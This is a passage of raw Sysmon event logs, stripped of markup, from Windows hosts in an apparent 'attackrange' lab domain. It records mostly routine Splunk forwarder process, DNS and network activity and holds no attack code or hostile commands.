Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.904{69CF5F33-8955-6151-9679-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:25.466{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7804C167024154181BC810923D7044C7,SHA256=AC82A9BE49B3D74EB03771D407C91EBD1D53E6045AEBACB1DDEC3EF1F19313A4,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001048825Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.461{5EBD8912-7B3A-6151-3A78-00000000FC01}7120d2nxq2uap88usk.cloudfront.net02600:9000:21f3:8600:a:da5e:7900:93a1;2600:9000:21f3:b000:a:da5e:7900:93a1;2600:9000:21f3:2000:a:da5e:7900:93a1;2600:9000:21f3:4600:a:da5e:7900:93a1;2600:9000:21f3:7200:a:da5e:7900:93a1;2600:9000:21f3:8200:a:da5e:7900:93a1;2600:9000:21f3:f000:a:da5e:7900:93a1;2600:9000:21f3:5000:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x80000000000000001048824Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.459{5EBD8912-7B3A-6151-3A78-00000000FC01}7120d2nxq2uap88usk.cloudfront.net013.226.145.65;13.226.145.44;13.226.145.45;13.226.145.126;C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000001048823Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.150{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local57246- 354300x80000000000000001048822Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.147{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53962- 354300x80000000000000001048821Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.060{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51283- 354300x80000000000000001048820Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.059{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local53263-false52.222.214.84server-52-222-214-84.fra56.r.cloudfront.net443https 354300x80000000000000001048819Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.055{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local60390-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x80000000000000001048818Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:23.055{5EBD8912-7F40-614D-2F00-00000000FC01}2464C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55560- 23542300x80000000000000001048817Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:25.055{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5F61753CFE9C9172241A4C9A18A18D8,SHA256=19DC81B1C608D1B58E661EA5725C51A76381F36CFF4A78E6520BB5C7457DED89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.763{69CF5F33-8956-6151-9779-00000000FD01}37282504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000977469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.623{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DC637115C30A912170C102EEC35A825,SHA256=9A0B1DB3E492C7258290BA7B9E11B75298CFBF0FC9771041A21C4EA8812409DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8956-6151-9779-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8956-6151-9779-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.607{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8956-6151-9779-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.592{69CF5F33-8956-6151-9779-00000000FD01}3728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:23.862{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-59656-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:23.814{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59306-false10.0.1.12-8000- 23542300x8000000000000000977453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.482{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6D22CC3366A252C074AF4409CBF265E,SHA256=A4B6EFF452C781AE777AF329E56AB47C494015985A15FDFD318791D4AC56158D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048826Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:26.086{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A7EDBCEBF5357B054E6178DB6E9BD9,SHA256=D17E060DFEACCDA3C72DBD5BF1433CFF13BB808AD9A627F707C97B7C38CF6265,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:26.169{69CF5F33-8955-6151-9679-00000000FD01}13121052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8957-6151-9979-00000000FD01}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:27.982{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51